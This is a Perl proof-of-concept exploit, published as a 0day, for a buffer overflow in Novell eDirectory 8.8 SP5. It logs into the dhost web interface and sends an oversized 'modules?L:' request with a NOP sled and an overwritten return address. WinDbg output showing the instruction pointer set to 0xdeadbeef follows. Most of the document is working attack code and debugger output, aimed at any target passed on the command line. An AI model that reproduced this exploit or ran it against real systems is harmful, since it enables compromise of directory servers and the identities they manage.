Novell eDirectory 8.8 SP5 Proof Of Concept

`#PoC for Vulnerability:  
#!usr\bin\perl  
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day  
#Vulnerability found in Hellcode Labs.  
#karak0rsan || murderkey  
#info[at]hellcode.net || www.hellcode.net  
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"  
#http://www.youtube.com/watch?v=6bloyjV-Hhs  
  
use WWW::Mechanize;   
  
use LWP::Debug qw(+);  
  
use HTTP::Cookies;  
  
$target=$ARGV[0];   
  
  
if(!$ARGV[0]){  
  
print "Novell eDirectory 8.8 SP5 Exploit\n";  
  
print "Hellcode Research || Hellcode.net\n";  
  
print "Usage:perl $0 [target]\n";  
  
exit();  
}  
  
  
  
$login_url = "$target/_LOGIN_SERVER_";  
  
$url = "$target/dhost/";  
  
$vuln = "modules?L:";  
  
$nop = "\x90" x 1668;  
  
$eip = "\xef\xbe\xad\xde";  
  
$data = "B" x 235;  
  
  
$hellcode = $vuln.$nop.$eip.$data;  
  
########Write your usr and pwd########  
  
$username = "Admin.context";  
  
$password = "1234";   
  
  
my $mechanize = WWW::Mechanize->new();  
  
  
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));  
  
  
$mechanize->timeout($url_timeout);   
  
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));   
  
  
$mechanize->submit_form(   
  
form_name => "authenticator",   
  
fields => {   
  
usr => $username,   
  
pwd => $password},   
  
button => 'Login');   
  
$response2 = $mechanize->get("$url$hellcode");  
  
  
  
##Debugger Results of PoC:  
  
Windbg- File>Attach to a process>dhost.exe  
  
eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000  
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246  
*** ERROR: Symbol file could not be found.   
Defaulted to export symbols for C:\Windows\system32\ntdll.dll -   
ntdll!DbgBreakPoint:  
77867dfe cc int 3  
0:088> g  
  
Debuggee is running...  
  
  
##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl  
  
##Debugger Results after running poc:  
  
(1cc.1d44): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878  
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
*** ERROR: Symbol file could not be found.   
Defaulted to export symbols for   
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll -   
MSVCR80!vfwprintf_p+0x5b:  
75c11684 8802 mov byte ptr [edx],al ds:0023:038b0000=??  
  
-- EAX = 00000042 (writed a part of eax)  
  
##0:010> g  
  
(8e4.bb4): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000  
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246  
deadbeef ?? ???  
  
#EIP=deadbeef - We controled eip ;)  
  
`